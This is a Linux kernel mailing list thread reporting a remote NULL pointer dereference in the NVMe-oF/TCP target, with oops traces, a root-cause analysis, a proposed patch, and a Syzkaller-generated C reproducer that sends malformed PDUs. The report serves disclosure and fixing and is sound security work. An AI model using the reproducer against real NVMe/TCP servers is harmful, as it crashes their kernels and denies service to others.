linux-nvme.lists.infradead.org archive mirror
* [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `nvmet_tcp_execute_request`
@ 2023-11-06 13:39 Alon Zahavi
  2023-11-15  9:40 ` Alon Zahavi
                   ` (2 more replies)
  0 siblings, 3 replies; 6+ messages in thread
From: Alon Zahavi @ 2023-11-06 13:39 UTC (permalink / raw)
  To: linux-nvme; +Cc: Sagi Grimberg, Christoph Hellwig, Chaitanya Kulkarni

# Bug Overview

## The Bug
There is a null-ptr-deref in `nvmet_tcp_execute_request`.

## Bug Location
`drivers/nvme/target/tcp.c` in the function `nvmet_tcp_execute_request`.

## Bug Class
Remote Denial of Service

## Disclaimer
This bug was found using Syzkaller with added NVMe-oF/TCP support.

# Technical Details

## Kernel Report - NULL Pointer Dereference
```
BUG: kernel NULL pointer dereference, address: 0000000000000000
#PF: supervisor instruction fetch in kernel mode
#PF: error_code(0x0010) - not-present page
PGD 800000003c2bc067 P4D 800000003c2bc067 PUD 3dfc5067 PMD 0
Oops: 0010 [#1] PREEMPT SMP KASAN PTI
CPU: 0 PID: 2363 Comm: kworker/0:1H Not tainted 6.5.0-rc1+ #4
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
Workqueue: nvmet_tcp_wq nvmet_tcp_io_work
RIP: 0010:0x0
Code: Unable to access opcode bytes at 0xffffffffffffffd6.
RSP: 0018:ffff888013b0fba8 EFLAGS: 00010246
RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000
RDX: ffff888013d50000 RSI: ffffffff833ddfe5 RDI: ffff88800e5a33e8
RBP: ffff888013b0fcf0 R08: 0000000000000001 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000001 R12: ffff88800e5a33e8
R13: 0000000000000000 R14: ffff88800e5a33e0 R15: dffffc0000000000
FS:  0000000000000000(0000) GS:ffff88806cc00000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: ffffffffffffffd6 CR3: 0000000016faa003 CR4: 0000000000370ef0
Call Trace:
 <TASK>
 nvmet_tcp_execute_request drivers/nvme/target/tcp.c:578 [inline]
 nvmet_tcp_try_recv_data drivers/nvme/target/tcp.c:1232 [inline]
 nvmet_tcp_try_recv_one drivers/nvme/target/tcp.c:1312 [inline]
 nvmet_tcp_try_recv drivers/nvme/target/tcp.c:1338 [inline]
 nvmet_tcp_io_work+0x202a/0x2990 drivers/nvme/target/tcp.c:1388
 process_one_work+0xb54/0x18b0 kernel/workqueue.c:2597
 worker_thread+0x663/0x1300 kernel/workqueue.c:2748
 kthread+0x357/0x460 kernel/kthread.c:389
 ret_from_fork+0x29/0x50 arch/x86/entry/entry_64.S:308
 </TASK>
Modules linked in:
CR2: 0000000000000000
---[ end trace 0000000000000000 ]---
```

## Description

### Tracing The Bug
In `nvmet_tcp_execute_request` (see code block 1) there is a call to
`cmd->req.execute()`. When running the reproducer, this function pointer
is NULL, which triggers the "BUG: kernel NULL pointer dereference" oops
shown above.

Code Block 1:
```
static void nvmet_tcp_execute_request(struct nvmet_tcp_cmd *cmd)
{
    if (unlikely(cmd->flags & NVMET_TCP_F_INIT_FAILED))
        nvmet_tcp_queue_response(&cmd->req);
    else
        cmd->req.execute(&cmd->req);
}
```

The reason `cmd->req.execute` is still NULL by the time
`nvmet_tcp_execute_request` runs lies in the `nvmet_req_init`
function (drivers/nvme/target/core.c).

Code Block 2:
```
bool nvmet_req_init(struct nvmet_req *req, struct nvmet_cq *cq,
                    struct nvmet_sq *sq, const struct nvmet_fabrics_ops *ops)
{
    ...

    if (unlikely(!req->sq->ctrl))
        /* will return an error for any non-connect command: */
        status = nvmet_parse_connect_cmd(req);
    else if (likely(req->sq->qid != 0))
        status = nvmet_parse_io_cmd(req);
    else
        status = nvmet_parse_admin_cmd(req);

  ...
}
```

`req->execute` is assigned inside the parsing functions such as
`nvmet_parse_admin_cmd` and `nvmet_parse_connect_cmd`.
As an example, code block 3 shows the assignment in
`nvmet_parse_connect_cmd` (drivers/nvme/target/fabrics-cmd.c).

Code Block 3:
```
u16 nvmet_parse_connect_cmd(struct nvmet_req *req)
{
    struct nvme_command *cmd = req->cmd;

    ...

    if (cmd->connect.qid == 0)
        req->execute = nvmet_execute_admin_connect;
    else
        req->execute = nvmet_execute_io_connect;
    return 0;
}
```

## Root Cause
When executing the reproducer the `nvmet_parse_connect_cmd` is not
being called, but execution is continuing to
`nvmet_tcp_execute_request` .
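
Just to illustrate where the NULL call could be caught (a sketch only, not a
proposed patch, and whether queueing a response is the right handling for such
a command is an assumption on my part), a missing `->execute` handler could be
treated like an init failure:

```
static void nvmet_tcp_execute_request(struct nvmet_tcp_cmd *cmd)
{
	/* Sketch: also bail out if no handler was ever assigned. */
	if (unlikely((cmd->flags & NVMET_TCP_F_INIT_FAILED) ||
		     !cmd->req.execute))
		nvmet_tcp_queue_response(&cmd->req);
	else
		cmd->req.execute(&cmd->req);
}
```

Whether the right place to handle this is here or earlier in the PDU receive
path is a separate question (see the replies below).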

## Reproducer
Below is a reproducer generated by Syzkaller, with some optimizations
and minor changes.

```
// autogenerated by syzkaller (https://github.com/google/syzkaller)

#define _GNU_SOURCE

#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#include <linux/capability.h>

uint64_t r[1] = {0xffffffffffffffff};

void loop(void)
{
  intptr_t res = 0;
  res = syscall(__NR_socket, /*domain=*/2ul, /*type=*/1ul, /*proto=*/0);
  if (res != -1)
    r[0] = res;
  *(uint16_t*)0x20000100 = 2;
  *(uint16_t*)0x20000102 = htobe16(0x1144);
  *(uint32_t*)0x20000104 = htobe32(0x7f000001);
  syscall(__NR_connect, /*fd=*/r[0], /*addr=*/0x20000100ul, /*addrlen=*/0x10ul);
  *(uint8_t*)0x200001c0 = 0;
  *(uint8_t*)0x200001c1 = 0;
  *(uint8_t*)0x200001c2 = 0x80;
  *(uint8_t*)0x200001c3 = 0;
  *(uint32_t*)0x200001c4 = 0x80;
  *(uint16_t*)0x200001c8 = 0;
  *(uint8_t*)0x200001ca = 0;
  *(uint8_t*)0x200001cb = 0;
  *(uint32_t*)0x200001cc = 0;
  memcpy((void*)0x200001d0,
         "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf"
         "\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf"
         "\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35"
         "\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86"
         "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf"
         "\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf"
         "\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86",
         112);
  syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x200001c0ul, /*len=*/0x80ul,
          /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
  *(uint8_t*)0x200001c0 = 6;
  *(uint8_t*)0x200001c1 = 3;
  *(uint8_t*)0x200001c2 = 0x18;
  *(uint8_t*)0x200001c3 = 0x18;
  *(uint32_t*)0x200001c4 = 9;
  *(uint16_t*)0x200001c8 = 0;
  *(uint16_t*)0x200001ca = 0;
  *(uint32_t*)0x200001cc = 0;
  *(uint32_t*)0x200001d0 = 0;
  memset((void*)0x200001d4, 0, 4);
  *(uint64_t*)0x20000240 = 0;
  syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x200001c0ul, /*len=*/0x88ul,
          /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
}
int main(void)
{
  syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
          /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
  syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=*/7ul,
          /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
  syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
          /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
  loop();
  return 0;
}
```
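
To make the raw writes easier to read, here is how I interpret the two headers
the reproducer sends, re-expressed as a small standalone program. The struct
mirrors the 8-byte NVMe/TCP common PDU header layout (type, flags, hlen, pdo,
plen); that mapping of the offsets is an assumption on my part, not something
the generated code states.

```
#include <stdint.h>
#include <stdio.h>

/* Assumed layout of the NVMe/TCP common PDU header. */
struct pdu_hdr {
	uint8_t  type;   /* byte written at 0x200001c0 */
	uint8_t  flags;  /* byte written at 0x200001c1 */
	uint8_t  hlen;   /* byte written at 0x200001c2 */
	uint8_t  pdo;    /* byte written at 0x200001c3 */
	uint32_t plen;   /* dword written at 0x200001c4 */
} __attribute__((packed));

int main(void)
{
	/* First sendto() (0x80 bytes): type 0x00 with hlen == plen == 0x80;
	 * the 112 pattern bytes fill out the rest of those 128 bytes. */
	struct pdu_hdr first = {
		.type = 0x00, .flags = 0x00, .hlen = 0x80, .pdo = 0x00,
		.plen = 0x80,
	};

	/* Second sendto() (0x88 bytes): type 0x06, hlen = pdo = 0x18 but
	 * plen = 9, i.e. the declared PDU length is smaller than the
	 * declared header length. */
	struct pdu_hdr second = {
		.type = 0x06, .flags = 0x03, .hlen = 0x18, .pdo = 0x18,
		.plen = 9,
	};

	printf("pdu1: type=%#x hlen=%#x plen=%u\n",
	       first.type, first.hlen, (unsigned)first.plen);
	printf("pdu2: type=%#x hlen=%#x plen=%u\n",
	       second.type, second.hlen, (unsigned)second.plen);
	return 0;
}
```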



* Re: [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `nvmet_tcp_execute_request`
  2023-11-06 13:39 [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `nvmet_tcp_execute_request` Alon Zahavi
@ 2023-11-15  9:40 ` Alon Zahavi
  2023-11-16  3:28 ` Guoqing Jiang
  2023-11-20 10:36 ` Sagi Grimberg
  2 siblings, 0 replies; 6+ messages in thread
From: Alon Zahavi @ 2023-11-15  9:40 UTC (permalink / raw)
  To: linux-nvme; +Cc: Sagi Grimberg, Christoph Hellwig, Chaitanya Kulkarni

Just sending another reminder about this issue.
Until it is fixed, a remote DoS can still be triggered.

On Mon, 6 Nov 2023 at 15:39, Alon Zahavi <zahavi.alon@gmail.com> wrote:
>
> # Bug Overview
>
> ## The Bug
> There is a null-ptr-deref in `nvmet_tcp_execute_request`.
>
> ## Bug Location
> `drivers/nvme/target/tcp.c` in the function `nvmet_tcp_execute_request`.
>
> ## Bug Class
> Remote Denial of Service
>
> ## Disclaimer:
> This bug was found using Syzkaller with NVMe-oF/TCP added support.
>
> # Technical Details
>
> ## Kernel Report - NULL Pointer Dereference
> ```
> BUG: kernel NULL pointer dereference, address: 0000000000000000
> #PF: supervisor instruction fetch in kernel mode
> #PF: error_code(0x0010) - not-present page
> PGD 800000003c2bc067 P4D 800000003c2bc067 PUD 3dfc5067 PMD 0
> Oops: 0010 [#1] PREEMPT SMP KASAN PTI
> CPU: 0 PID: 2363 Comm: kworker/0:1H Not tainted 6.5.0-rc1+ #4
> Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
> Workqueue: nvmet_tcp_wq nvmet_tcp_io_work
> RIP: 0010:0x0
> Code: Unable to access opcode bytes at 0xffffffffffffffd6.
> RSP: 0018:ffff888013b0fba8 EFLAGS: 00010246
> RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000
> RDX: ffff888013d50000 RSI: ffffffff833ddfe5 RDI: ffff88800e5a33e8
> RBP: ffff888013b0fcf0 R08: 0000000000000001 R09: 0000000000000000
> R10: 0000000000000000 R11: 0000000000000001 R12: ffff88800e5a33e8
> R13: 0000000000000000 R14: ffff88800e5a33e0 R15: dffffc0000000000
> FS:  0000000000000000(0000) GS:ffff88806cc00000(0000) knlGS:0000000000000000
> CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> CR2: ffffffffffffffd6 CR3: 0000000016faa003 CR4: 0000000000370ef0
> Call Trace:
>  <TASK>
>  nvmet_tcp_execute_request drivers/nvme/target/tcp.c:578 [inline]
>  nvmet_tcp_try_recv_data drivers/nvme/target/tcp.c:1232 [inline]
>  nvmet_tcp_try_recv_one drivers/nvme/target/tcp.c:1312 [inline]
>  nvmet_tcp_try_recv drivers/nvme/target/tcp.c:1338 [inline]
>  nvmet_tcp_io_work+0x202a/0x2990 drivers/nvme/target/tcp.c:1388
>  process_one_work+0xb54/0x18b0 kernel/workqueue.c:2597
>  worker_thread+0x663/0x1300 kernel/workqueue.c:2748
>  kthread+0x357/0x460 kernel/kthread.c:389
>  ret_from_fork+0x29/0x50 arch/x86/entry/entry_64.S:308
>  </TASK>
> Modules linked in:
> CR2: 0000000000000000
> ---[ end trace 0000000000000000 ]---
> ```
>
> ## Description
>
> ### Tracing The Bug
> In the call for `nvmet_tcp_execute_request` (see code block 1), there
> is a call to `cmd->req.execute()`.
> When executing the reproducer, the function pointer is pointing to
> NULL, thus the BUG: Unable to handle NULL pointer dereference.
>
> Code Block 1:
> ```
> static void nvmet_tcp_execute_request(struct nvmet_tcp_cmd *cmd)
> {
>     if (unlikely(cmd->flags & NVMET_TCP_F_INIT_FAILED))
>         nvmet_tcp_queue_response(&cmd->req);
>     else
>         cmd->req.execute(&cmd->req);
> }
> ```
>
> The reason why `cmd->req.execute` is NULL when we get into the
> `nvmet_tcp_execute_request` function lies in the `nvmet_req_init`
> function (drivers/nvme/target/core.c).
>
> Code Block 2:
> ```
> bool nvmet_req_init(struct nvmet_req *req, struct nvmet_cq *cq,
>                                  struct nvmet_sq *sq, const struct
> nvmet_fabrics_ops *ops)
> {
>     ...
>
>     if (unlikely(!req->sq->ctrl))
>         /* will return an error for any non-connect command: */
>         status = nvmet_parse_connect_cmd(req);
>     else if (likely(req->sq->qid != 0))
>         status = nvmet_parse_io_cmd(req);
>     else
>         status = nvmet_parse_admin_cmd(req);
>
>   ...
> }
> ```
>
> In the `nvmet_parse_admin_cmd` and `nvmet_parse_connect_cmd`
> functions, there are some assignments for `req->execute`.
> For example, here is in code block 3, the assignment in
> `nvmet_parse_connect_command` (drivers/nvme/target/fabrics-cmd.c).
>
> Code Block 3:
> ```
> u16 nvmet_parse_connect_cmd(struct nvmet_req *req)
> {
>     struct nvme_command *cmd = req->cmd;
>
>     ...
>
>     if (cmd->connect.qid == 0)
>         req->execute = nvmet_execute_admin_connect;
>     else
>         req->execute = nvmet_execute_io_connect;
>      return 0;
> }
> ```
>
> ## Root Cause
> When executing the reproducer the `nvmet_parse_connect_cmd` is not
> being called, but execution is continuing to
> `nvmet_tcp_execute_request` .
>
> ## Reproducer
> I am adding a reproducer generated by Syzkaller with some
> optimizations and minor changes.
>
> ```
> // autogenerated by syzkaller (https://github.com/google/syzkaller)
>
> #define _GNU_SOURCE
>
> #include <endian.h>
> #include <errno.h>
> #include <fcntl.h>
> #include <sched.h>
> #include <stdarg.h>
> #include <stdbool.h>
> #include <stdint.h>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <sys/mount.h>
> #include <sys/prctl.h>
> #include <sys/resource.h>
> #include <sys/stat.h>
> #include <sys/syscall.h>
> #include <sys/time.h>
> #include <sys/types.h>
> #include <sys/wait.h>
> #include <unistd.h>
>
> #include <linux/capability.h>
>
> uint64_t r[1] = {0xffffffffffffffff};
>
> void loop(void)
> {
>   intptr_t res = 0;
>   res = syscall(__NR_socket, /*domain=*/2ul, /*type=*/1ul, /*proto=*/0);
>   if (res != -1)
>     r[0] = res;
>   *(uint16_t*)0x20000100 = 2;
>   *(uint16_t*)0x20000102 = htobe16(0x1144);
>   *(uint32_t*)0x20000104 = htobe32(0x7f000001);
>   syscall(__NR_connect, /*fd=*/r[0], /*addr=*/0x20000100ul, /*addrlen=*/0x10ul);
>   *(uint8_t*)0x200001c0 = 0;
>   *(uint8_t*)0x200001c1 = 0;
>   *(uint8_t*)0x200001c2 = 0x80;
>   *(uint8_t*)0x200001c3 = 0;
>   *(uint32_t*)0x200001c4 = 0x80;
>   *(uint16_t*)0x200001c8 = 0;
>   *(uint8_t*)0x200001ca = 0;
>   *(uint8_t*)0x200001cb = 0;
>   *(uint32_t*)0x200001cc = 0;
>   memcpy((void*)0x200001d0,
>          "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf"
>          "\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf"
>          "\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35"
>          "\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86"
>          "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf"
>          "\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf"
>          "\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86",
>          112);
>   syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x200001c0ul, /*len=*/0x80ul,
>           /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
>   *(uint8_t*)0x200001c0 = 6;
>   *(uint8_t*)0x200001c1 = 3;
>   *(uint8_t*)0x200001c2 = 0x18;
>   *(uint8_t*)0x200001c3 = 0x18;
>   *(uint32_t*)0x200001c4 = 9;
>   *(uint16_t*)0x200001c8 = 0;
>   *(uint16_t*)0x200001ca = 0;
>   *(uint32_t*)0x200001cc = 0;
>   *(uint32_t*)0x200001d0 = 0;
>   memset((void*)0x200001d4, 0, 4);
>   *(uint64_t*)0x20000240 = 0;
>   syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x200001c0ul, /*len=*/0x88ul,
>           /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
> }
> int main(void)
> {
>   syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
>           /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
>   syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=*/7ul,
>           /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
>   syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
>           /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
>   loop();
>   return 0;
> }
> ```



* Re: [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `nvmet_tcp_execute_request`
  2023-11-06 13:39 [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `nvmet_tcp_execute_request` Alon Zahavi
  2023-11-15  9:40 ` Alon Zahavi
@ 2023-11-16  3:28 ` Guoqing Jiang
  2023-11-19 22:18   ` Alon Zahavi
  2023-11-20 10:36 ` Sagi Grimberg
  2 siblings, 1 reply; 6+ messages in thread
From: Guoqing Jiang @ 2023-11-16  3:28 UTC (permalink / raw)
  To: Alon Zahavi, linux-nvme
  Cc: Sagi Grimberg, Christoph Hellwig, Chaitanya Kulkarni

Hi,

On 11/6/23 21:39, Alon Zahavi wrote:
> # Bug Overview
>
> ## The Bug
> There is a null-ptr-deref in `nvmet_tcp_execute_request`.
>
> ## Bug Location
> `drivers/nvme/target/tcp.c` in the function `nvmet_tcp_execute_request`.
>
> ## Bug Class
> Remote Denial of Service
>
> ## Disclaimer:
> This bug was found using Syzkaller with NVMe-oF/TCP added support.
>
> # Technical Details
>
> ## Kernel Report - NULL Pointer Dereference
> ```
> BUG: kernel NULL pointer dereference, address: 0000000000000000
> #PF: supervisor instruction fetch in kernel mode
> #PF: error_code(0x0010) - not-present page
> PGD 800000003c2bc067 P4D 800000003c2bc067 PUD 3dfc5067 PMD 0
> Oops: 0010 [#1] PREEMPT SMP KASAN PTI
> CPU: 0 PID: 2363 Comm: kworker/0:1H Not tainted 6.5.0-rc1+ #4
> Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
> Workqueue: nvmet_tcp_wq nvmet_tcp_io_work
> RIP: 0010:0x0
> Code: Unable to access opcode bytes at 0xffffffffffffffd6.
> RSP: 0018:ffff888013b0fba8 EFLAGS: 00010246
> RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000
> RDX: ffff888013d50000 RSI: ffffffff833ddfe5 RDI: ffff88800e5a33e8
> RBP: ffff888013b0fcf0 R08: 0000000000000001 R09: 0000000000000000
> R10: 0000000000000000 R11: 0000000000000001 R12: ffff88800e5a33e8
> R13: 0000000000000000 R14: ffff88800e5a33e0 R15: dffffc0000000000
> FS:  0000000000000000(0000) GS:ffff88806cc00000(0000) knlGS:0000000000000000
> CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> CR2: ffffffffffffffd6 CR3: 0000000016faa003 CR4: 0000000000370ef0
> Call Trace:
>   <TASK>
>   nvmet_tcp_execute_request drivers/nvme/target/tcp.c:578 [inline]
>   nvmet_tcp_try_recv_data drivers/nvme/target/tcp.c:1232 [inline]
>   nvmet_tcp_try_recv_one drivers/nvme/target/tcp.c:1312 [inline]
>   nvmet_tcp_try_recv drivers/nvme/target/tcp.c:1338 [inline]
>   nvmet_tcp_io_work+0x202a/0x2990 drivers/nvme/target/tcp.c:1388
>   process_one_work+0xb54/0x18b0 kernel/workqueue.c:2597
>   worker_thread+0x663/0x1300 kernel/workqueue.c:2748
>   kthread+0x357/0x460 kernel/kthread.c:389
>   ret_from_fork+0x29/0x50 arch/x86/entry/entry_64.S:308
>   </TASK>
> Modules linked in:
> CR2: 0000000000000000
> ---[ end trace 0000000000000000 ]---
> ```
>
> ## Description
>
> ### Tracing The Bug
> In the call for `nvmet_tcp_execute_request` (see code block 1), there
> is a call to `cmd->req.execute()`.
> When executing the reproducer, the function pointer is pointing to
> NULL, thus the BUG: Unable to handle NULL pointer dereference.
>
> Code Block 1:
> ```
> static void nvmet_tcp_execute_request(struct nvmet_tcp_cmd *cmd)
> {
>      if (unlikely(cmd->flags & NVMET_TCP_F_INIT_FAILED))
>          nvmet_tcp_queue_response(&cmd->req);
>      else
>          cmd->req.execute(&cmd->req);
> }
> ```
>
> The reason why `cmd->req.execute` is NULL when we get into the
> `nvmet_tcp_execute_request` function lies in the `nvmet_req_init`
> function (drivers/nvme/target/core.c).
>
> Code Block 2:
> ```
> bool nvmet_req_init(struct nvmet_req *req, struct nvmet_cq *cq,
>                                   struct nvmet_sq *sq, const struct
> nvmet_fabrics_ops *ops)
> {
>      ...
>
>      if (unlikely(!req->sq->ctrl))
>          /* will return an error for any non-connect command: */
>          status = nvmet_parse_connect_cmd(req);
>      else if (likely(req->sq->qid != 0))
>          status = nvmet_parse_io_cmd(req);
>      else
>          status = nvmet_parse_admin_cmd(req);
>
>    ...
> }
> ```
>
> In the `nvmet_parse_admin_cmd` and `nvmet_parse_connect_cmd`
> functions, there are some assignments for `req->execute`.
> For example, here is in code block 3, the assignment in
> `nvmet_parse_connect_command` (drivers/nvme/target/fabrics-cmd.c).
>
> Code Block 3:
> ```
> u16 nvmet_parse_connect_cmd(struct nvmet_req *req)
> {
>      struct nvme_command *cmd = req->cmd;
>
>      ...
>
>      if (cmd->connect.qid == 0)
>          req->execute = nvmet_execute_admin_connect;
>      else
>          req->execute = nvmet_execute_io_connect;
>       return 0;
> }
> ```
>
> ## Root Cause
> When executing the reproducer the `nvmet_parse_connect_cmd` is not
> being called, but execution is continuing to
> `nvmet_tcp_execute_request` .
>
> ## Reproducer
> I am adding a reproducer generated by Syzkaller with some
> optimizations and minor changes.

Could you try the change to see if it helps?

--- a/drivers/nvme/target/tcp.c
+++ b/drivers/nvme/target/tcp.c
@@ -1062,7 +1062,7 @@ static int nvmet_tcp_done_recv_pdu(struct nvmet_tcp_queue *queue)
 			le32_to_cpu(req->cmd->common.dptr.sgl.length));
 
 		nvmet_tcp_handle_req_failure(queue, queue->cmd, req);
-		return 0;
+		return -EAGAIN;
 	}

Thanks,
Guoqing



* Re: [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `nvmet_tcp_execute_request`
  2023-11-16  3:28 ` Guoqing Jiang
@ 2023-11-19 22:18   ` Alon Zahavi
  2023-11-20  6:03     ` Guoqing Jiang
  0 siblings, 1 reply; 6+ messages in thread
From: Alon Zahavi @ 2023-11-19 22:18 UTC (permalink / raw)
  To: Guoqing Jiang
  Cc: linux-nvme, Sagi Grimberg, Christoph Hellwig, Chaitanya Kulkarni

On Thu, 16 Nov 2023 at 05:28, Guoqing Jiang <guoqing.jiang@linux.dev> wrote:
>
> Hi,
>
> On 11/6/23 21:39, Alon Zahavi wrote:
> > # Bug Overview
> >
> > ## The Bug
> > There is a null-ptr-deref in `nvmet_tcp_execute_request`.
> >
> > ## Bug Location
> > `drivers/nvme/target/tcp.c` in the function `nvmet_tcp_execute_request`.
> >
> > ## Bug Class
> > Remote Denial of Service
> >
> > ## Disclaimer:
> > This bug was found using Syzkaller with NVMe-oF/TCP added support.
> >
> > # Technical Details
> >
> > ## Kernel Report - NULL Pointer Dereference
> > ```
> > BUG: kernel NULL pointer dereference, address: 0000000000000000
> > #PF: supervisor instruction fetch in kernel mode
> > #PF: error_code(0x0010) - not-present page
> > PGD 800000003c2bc067 P4D 800000003c2bc067 PUD 3dfc5067 PMD 0
> > Oops: 0010 [#1] PREEMPT SMP KASAN PTI
> > CPU: 0 PID: 2363 Comm: kworker/0:1H Not tainted 6.5.0-rc1+ #4
> > Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
> > Workqueue: nvmet_tcp_wq nvmet_tcp_io_work
> > RIP: 0010:0x0
> > Code: Unable to access opcode bytes at 0xffffffffffffffd6.
> > RSP: 0018:ffff888013b0fba8 EFLAGS: 00010246
> > RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000
> > RDX: ffff888013d50000 RSI: ffffffff833ddfe5 RDI: ffff88800e5a33e8
> > RBP: ffff888013b0fcf0 R08: 0000000000000001 R09: 0000000000000000
> > R10: 0000000000000000 R11: 0000000000000001 R12: ffff88800e5a33e8
> > R13: 0000000000000000 R14: ffff88800e5a33e0 R15: dffffc0000000000
> > FS:  0000000000000000(0000) GS:ffff88806cc00000(0000) knlGS:0000000000000000
> > CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> > CR2: ffffffffffffffd6 CR3: 0000000016faa003 CR4: 0000000000370ef0
> > Call Trace:
> >   <TASK>
> >   nvmet_tcp_execute_request drivers/nvme/target/tcp.c:578 [inline]
> >   nvmet_tcp_try_recv_data drivers/nvme/target/tcp.c:1232 [inline]
> >   nvmet_tcp_try_recv_one drivers/nvme/target/tcp.c:1312 [inline]
> >   nvmet_tcp_try_recv drivers/nvme/target/tcp.c:1338 [inline]
> >   nvmet_tcp_io_work+0x202a/0x2990 drivers/nvme/target/tcp.c:1388
> >   process_one_work+0xb54/0x18b0 kernel/workqueue.c:2597
> >   worker_thread+0x663/0x1300 kernel/workqueue.c:2748
> >   kthread+0x357/0x460 kernel/kthread.c:389
> >   ret_from_fork+0x29/0x50 arch/x86/entry/entry_64.S:308
> >   </TASK>
> > Modules linked in:
> > CR2: 0000000000000000
> > ---[ end trace 0000000000000000 ]---
> > ```
> >
> > ## Description
> >
> > ### Tracing The Bug
> > In the call for `nvmet_tcp_execute_request` (see code block 1), there
> > is a call to `cmd->req.execute()`.
> > When executing the reproducer, the function pointer is pointing to
> > NULL, thus the BUG: Unable to handle NULL pointer dereference.
> >
> > Code Block 1:
> > ```
> > static void nvmet_tcp_execute_request(struct nvmet_tcp_cmd *cmd)
> > {
> >      if (unlikely(cmd->flags & NVMET_TCP_F_INIT_FAILED))
> >          nvmet_tcp_queue_response(&cmd->req);
> >      else
> >          cmd->req.execute(&cmd->req);
> > }
> > ```
> >
> > The reason why `cmd->req.execute` is NULL when we get into the
> > `nvmet_tcp_execute_request` function lies in the `nvmet_req_init`
> > function (drivers/nvme/target/core.c).
> >
> > Code Block 2:
> > ```
> > bool nvmet_req_init(struct nvmet_req *req, struct nvmet_cq *cq,
> >                                   struct nvmet_sq *sq, const struct
> > nvmet_fabrics_ops *ops)
> > {
> >      ...
> >
> >      if (unlikely(!req->sq->ctrl))
> >          /* will return an error for any non-connect command: */
> >          status = nvmet_parse_connect_cmd(req);
> >      else if (likely(req->sq->qid != 0))
> >          status = nvmet_parse_io_cmd(req);
> >      else
> >          status = nvmet_parse_admin_cmd(req);
> >
> >    ...
> > }
> > ```
> >
> > In the `nvmet_parse_admin_cmd` and `nvmet_parse_connect_cmd`
> > functions, there are some assignments for `req->execute`.
> > For example, here is in code block 3, the assignment in
> > `nvmet_parse_connect_command` (drivers/nvme/target/fabrics-cmd.c).
> >
> > Code Block 3:
> > ```
